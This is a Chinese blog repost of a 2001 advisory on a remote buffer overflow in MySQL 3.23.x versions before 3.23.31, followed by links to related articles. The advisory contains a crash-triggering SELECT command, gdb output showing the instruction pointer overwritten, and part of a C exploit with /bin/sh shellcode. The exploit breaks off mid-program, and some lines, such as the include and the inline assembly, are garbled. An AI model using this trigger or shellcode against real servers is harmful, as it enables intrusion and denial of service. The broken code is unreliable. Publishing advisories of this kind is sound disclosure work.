mysql溢出漏洞,Mysql 远程缓冲区溢出漏洞

最新推荐文章于 2023-02-25 10:13:09 发布
最新推荐文章于 2023-02-25 10:13:09 发布
阅读量861 收藏
点赞数
文章标签: mysql溢出漏洞

c4468b3f4df77e96b0a416fa2a870fba.png

Mysql 远程缓冲区溢出漏洞

发布日期:2001-01-27

更新日期:2001-01-27

受影响系统:T.C.X DataKonsult MySQL 3.23.30

T.C.X DataKonsult MySQL 3.23.29

T.C.X DataKonsult MySQL 3.23.28

T.C.X DataKonsult MySQL 3.23.27

T.C.X DataKonsult MySQL 3.23.26

T.C.X DataKonsult MySQL 3.23.25

T.C.X DataKonsult MySQL 3.23.24

T.C.X DataKonsult MySQL 3.23.23不受影响系统:T.C.X DataKonsult MySQL 3.23.31描述:BUGTRAQ ID: 2262

CVE(CAN) ID: CAN-2001-1274

MySQL是一个开放源代码的自由数据库软件。3.23.31以前的版本都存在一个缓冲区

溢出漏洞。

通过使用一个特别长的字符串作为SELECT语句的参数,可能导致mysqld发生缓冲区

溢出。堆栈中的数据可能被覆盖或修改,攻击者可能远程获取mysqld的运行权限或

使mysqld数据库崩溃。

测试方法:警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Joao Gouveia提供了下列测试步骤:

> On one terminal:

>

> spike:/var/mysql # /sbin/init.d/mysql start

> Starting service MySQL.

> Starting mysqld daemon with databases from /var/mysql

> done

> spike:/var/mysql #

>

>

> On the other terminal:

>

> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'

> Enter password:

> (hanged..^C)

>

>

> On the first terminal i got:

>

> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault

> nohup

> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin

> g "$@" >>$err_log 2>&1>

> Number of processes running now: 0

> mysqld restarted on Fri Jan 12 07:10:54 WET 2001

> mysqld daemon ended

>

>

> gdb shows the following:

>

> (gdb) run

> Starting program: /usr/sbin/mysqld

> [New Thread 16897 (manager thread)]

> [New Thread 16891 (initial thread)]

> [New Thread 16898]

> /usr/sbin/mysqld: ready for connections

> [New Thread 16916]

> [Switching to Thread 16916]

>

> Program received signal SIGSEGV, Segmentation fault.

> 0x41414141 in ?? ()

> (gdb) info all-registers

> eax 0x1 1

> ecx 0x68 104

> edx 0x8166947 135686471

> ebx 0x41414141 1094795585

> esp 0xbf5ff408 0xbf5ff408

> ebp 0x41414141 0x41414141

> esi 0x41414141 1094795585

> edi 0x0 0

> eip 0x41414141 0x41414141

> eflags 0x10246 66118

> cs 0x23 35

> ss 0x2b 43

> ds 0x2b 43

> es 0x2b 43

> fs 0x0 0

> gs 0x0 0

> (gdb)

>

Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一个测试程序:

#include

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 130

#define NOP 0x90

// Our EVIL code...

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned

long get_sp(void) {

__asm__("movl %esp,陎");

}

// Where it all happens...

main(int argc, char *argv[])

{

char *buffer, *ptr, tmp[1500];

long *addr_ptr, addr;

int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;

printf("\nMySQL [al versions < 3.23.31] Local Exploit by

lms@ispgaya.pt\n\n");

if (argc==2) offset=atoi(argv[1]);

else

printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");

printf("Trying to allocate memory for buffer (%d bytes)...",bsize);

if (!(buffer = malloc(bsize))) {

printf("ERROR!\n");

printf("Couldn't allocate memory...\n");

printf("Exiting...\n");

exit(0);

}

printf("SUCCESS!\n");

addr=get_sp()-offset;

printf("Using address : 0x%x\n", addr);

printf("Offset : %d\n",offset);

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com

特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

CodeMaster
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql4.1.2缓冲区溢出漏洞_Kali学习笔记21:缓冲区溢出实验(漏洞发现)
weixin_30477489的博客
02-07 156
上一篇文章,我已经做好了缓冲区溢出实验的准备工作:下面就是Kali虚拟机对缓冲区溢出的测试:已经知道目标IP为:192.168.163.130连接目标机器110端口成功,接下来进行测试事先已经知道PASS命令存在缓冲区溢出漏洞:只要在PASS后边输入的数据达到某一个值时,就会出现缓冲区溢出漏洞但是,手动尝试这个值实在有点低端,写一个Python脚本:先写一个基本的脚本来测试:#!/usr/bin/...
mysql4.1.2缓冲区溢出漏洞_缓冲区溢出漏洞
weixin_35757191的博客
01-19 634
缓冲区溢出就是在大缓冲区数据向小缓冲区复制的过程中,由于没有注意到小缓冲区的边界,“撑爆”了较小的缓冲区,从而冲掉了和小缓冲区相邻内存区域的其他数据而引起的内存问题。缓冲区溢出是常见的内存错误之一,成功的利用该漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码最终获得主机的控制权。进程使用的内存按照功能大致分为以下四个部分:1、代码区:这个区域存储着被装入执行的二进制机器代码,处理器会到这...
mysql 缓冲区溢出_MariaDB缓冲区溢出漏洞
weixin_33171065的博客
01-27 669
发布日期:2012-11-29更新日期:2012-12-03受影响系统:MariaDB MariaDB 5.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56750CVE(CAN) ID: CVE-2012-5579MariaDB 是一个采用Maria...
mysql信息泄露漏洞,MySQL远程信息泄漏和缓冲区溢出漏洞
weixin_29711757的博客
03-17 1011
MySQL远程信息泄漏和缓冲区溢出漏洞2006-05-10eNet&Ciweek3 COM_TABLE_DUMP服务器入侵在sql/sql_base.cc的1090行:TABLE *open_table(THD *thd, TABLE_LIST *table_list, MEM_ROOT *mem_root,bool *refresh, uint flags){reg1 TABLE *ta...
mysql溢出漏洞_MySQL COM_FIELD_LIST命令远程溢出漏洞
weixin_29505121的博客
01-25 319
发布日期:2010-05-12更新日期:2010-05-13受影响系统:Oracle MySQL 5.1Oracle MySQL 5.0不受影响系统:Oracle MySQL 5.1.47描述:--------------------------------------------------------------------------------BUGTRAQ ID: 40106CVE I...
oracle缓冲区溢出,Oracle数据库连接远程缓冲区溢出漏洞
weixin_28920737的博客
04-12 499
厂商补丁:Oracle------Oracle已经为此发布了一个安全公告(OracleSA#54)以及相应补丁:OracleSA#54:Buffer Overflow in Oracle Net Services for Oracle Database Server补丁下载:补丁号如下:操作平台 9.2.0.2 9.0.1.4 8.1.7.4 8....
mysql4.1.2缓冲区溢出漏洞_Oracle MySQL/MariaDB acl_get()和check_grant_db_routine()函数缓冲区溢出漏洞...
weixin_39809175的博客
02-18 265
发布日期:2012-12-01更新日期:2012-12-05受影响系统:Oracle MySQL 5.5.19MariaDB MariaDB 5.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56769CVE(CAN) ID: CVE-2012-561...
mysql 缓冲区溢出_CVE-2012-5611MySQL/MariaDB 基于栈的缓冲区溢出漏洞
weixin_39894932的博客
01-19 537
利用条件:需要有效的MySQL用户名和密码1、MySQL零日漏洞概述为了确定最近MySQL零日漏洞的严重程度,我们首先必须深入分析每个漏洞。这些漏洞已经被分配了以下公共漏洞和暴露(Common Vulnerabilities and Exposures CVE)ID:◆ CVE-2012-5611 MySQL基于堆栈的缓冲区溢出:这是通过发送超长参数到GRANT FILE命令来触发的,该操作会导...
缓冲区溢出漏洞
cyynid的博客
02-25 3989
在计算机操作系统中,“缓冲区”是指内存空间中用来存储程序运行时临时数据的一片大小有限并且连续的内存区域。根据程序中内存的分配方式和使用目的,缓冲区一般可分为栈和堆两种类型。C语言程序中定义的数组就是一种最常见的栈缓冲区缓冲区溢出漏洞,作为软件中最容易发生的一类漏洞,其形成原理就是:当程序在处理用户数据时,未能对其大小进行恰当的限制,或者在进行拷贝、填充时没对这些数据限定边界,导致实际操作的数据大小超过了内存中目标缓冲区的大小,使得内存中一些关键数据被覆盖、从而引发安全问题。
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
MySQL OOM(内存溢出)的解决思路
09-08
- 使用`free -m`命令检查系统的内存使用情况,包括总内存、已用内存、空闲内存以及缓冲区和缓存的大小。 - 使用`top`或`ps`命令找出占用内存最多的进程,特别是MySQL的`mysqld`进程,以确定是哪个服务导致的内存...
mysql 8.0.29_MYSQL
09-22
这可能包括SQL注入、权限提升、缓冲区溢出等类型的漏洞。通过修复这些问题,MySQL 8.0.29可以提供更可靠的数据保护,确保用户数据的安全性。 2. **性能优化**:MySQL 8.0系列致力于提升查询处理速度和并发性能。...
MYSQL_C_API详解1
08-03
1. 通讯缓冲区的大小需要根据实际情况进行调整,以避免溢出错误。 2. 在多线程编程中,需要遵守一定的规则来避免冲突和错误。 3. 需要了解MYSQL_C_API的各个数据类型,并根据实际情况进行选择和使用。 MYSQL_C_...
MySQL之动态字符串处理
12-14
它首先根据传入的初始字符串和分配增量计算合适的缓冲区大小,并使用`my_malloc`函数分配内存。如果需要初始化字符串,它会将字符串复制到新分配的内存中。 在字符串需要扩展时,`dynstr_append_mem`函数用于追加新...
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
【JCR一区级】麻雀搜索算法SSA-CNN-LSTM-Attention故障诊断分类预测【含源码 5689期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
详解MATLAB Simulink通信系统建模与仿真
07-30
第1 章 MATLAB 基础与通信系统仿真 1.1 MATLAB 简介 1.2 MATLAB 程序设计 1.3 通信系统仿真 第2 章 Simulink 仿真基础 2.1 Simulink 简介 2.2 Simulink 工作环境 2.3 Simulink 仿真的基本方法 2.4 创建自己的模块库 2.5 S-函数的编写 第3 章 通信信号与系统分析 3.1 离散信号和系统 3.2 Fourier 分析 3.3 带通信号的低通等效 3.4 随机信号分析 第4 章 信道 4.1 加性高斯白噪声信道 4.2 多径衰落信道 第5 章 模拟调制 5.1 幅度调制 5.2 角度调制 第6 章 数字基带传输 6.1 概述 6.2 二进制基带信号传输 6.3 基带PAM 信号传输 6.4 带限信道的信号传输 第7 章 数字信号载波传输 7.1 概述 7.2 载波幅度调制(PAM) 7.3 载波相位调制(PSK) 7.4 正交幅度调制(QAM) 7.5 载波频率调制(FSK) 第8 章 信道编码和交织 8.1 概述 8.2 线性分组码
SCI一区】淘金算法GRO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5642.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值